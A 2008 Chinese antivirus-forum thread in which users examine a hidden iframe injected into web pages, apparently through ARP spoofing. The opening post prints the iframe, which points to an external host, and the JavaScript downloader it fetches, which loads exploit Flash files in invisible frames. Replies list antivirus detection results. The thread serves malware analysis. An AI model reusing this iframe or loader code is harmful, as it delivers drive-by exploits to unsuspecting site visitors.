查看: 3446|回复: 19
收起左侧

[已鉴定] 某机器感染ARP病毒,网页挂马

 关闭 [复制链接]
yk1234
发表于 2008-8-6 18:58:24 | 显示全部楼层 |阅读模式
所有网页源码里都有:
<iframe src=http://wm.xnibi.com/index2.gif width=100 height=0></iframe>                                                                                                                                                                
使用迅雷下载index2.gif,记事本打开为:
SCRIPT LANGUAGE="javascript">
window.onerror=function(){return true;}
function init(){document.write();}
window.onload = init;
if(document.cookie.indexOf("tyeyede=")==-1)
{
var skpaopao=new Date();
var expires=new Date();
expires.setTime(expires.getTime()+24*60*60*1000);
document.cookie="tyeyede=Yes;path=/;expires="+expires.toGMTString();
if(navigator.userAgent.toLowerCase().indexOf("msie")>0)
{
document.write('<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=4,0,19,0" width="0" height="0" align="middle">');
document.write('<param name="allowScriptAccess" value="sameDomain"/>');
document.write('<param name="movie" value="ie.swf"/>');
document.write('<param name="quality" value="high"/>');
document.write('<param name="bgcolor" value="#ffffff"/>');
document.write('<embed src="ie.swf"/>');
document.write('</object>');
}
else
{
document.write("<EMBED src=ff.swf width=0 height=0>");
}
}
document.writeln("<iframe src=next2.htm width=50 height=0><\/iframe>");
</SCRIPT>
</BODY></HTML>
<script type="text/javascript" src="http://js.tongji.cn.yahoo.com/641617/ystat.js"></script><noscript><a href="http://tongji.cn.yahoo.com"><img src="http://img.tongji.cn.yahoo.com/641617/ystat.gif"/></a></noscript>

感谢8楼提供样本地址。




[ 本帖最后由 yk1234 于 2008-8-6 19:21 编辑 ]
LEYUSGO
发表于 2008-8-6 18:59:34 | 显示全部楼层
dr.web miss all[:1:]
tanlimo
发表于 2008-8-6 19:01:34 | 显示全部楼层
卡8对此脚本无视
Nerazzurri
发表于 2008-8-6 19:02:58 | 显示全部楼层
Begin scan in 'C:\Documents and Settings\Nerazzurri\桌面\index2.rar'
C:\Documents and Settings\Nerazzurri\桌面\index2.rar
    [0] Archive type: RAR
    --> index2.gif
      [DETECTION] Contains recognition pattern of the JS/Dldr.Agent.SJ Java script virus
    [NOTE]      The file was deleted!
Palkia
发表于 2008-8-6 19:04:21 | 显示全部楼层
bd  0  
金山 0
jimmyleo
发表于 2008-8-6 19:05:43 | 显示全部楼层
126被挂?那感染面很广啊....


已经托管给qq了说...
granthill
发表于 2008-8-6 19:05:55 | 显示全部楼层
好像没有啊
是不是 楼主arp了??
qianwenxiang
发表于 2008-8-6 19:06:13 | 显示全部楼层
yk1234
 楼主| 发表于 2008-8-6 19:07:31 | 显示全部楼层
完了,原以为是126挂马了,原来是有人中了ARP病毒。难怪很卡。不好意思,之前没搞清楚。

[ 本帖最后由 yk1234 于 2008-8-6 19:33 编辑 ]
电影结束了
发表于 2008-8-6 19:08:20 | 显示全部楼层

过了BD
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2024-12-17 02:36 , Processed in 0.131734 second(s), 18 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表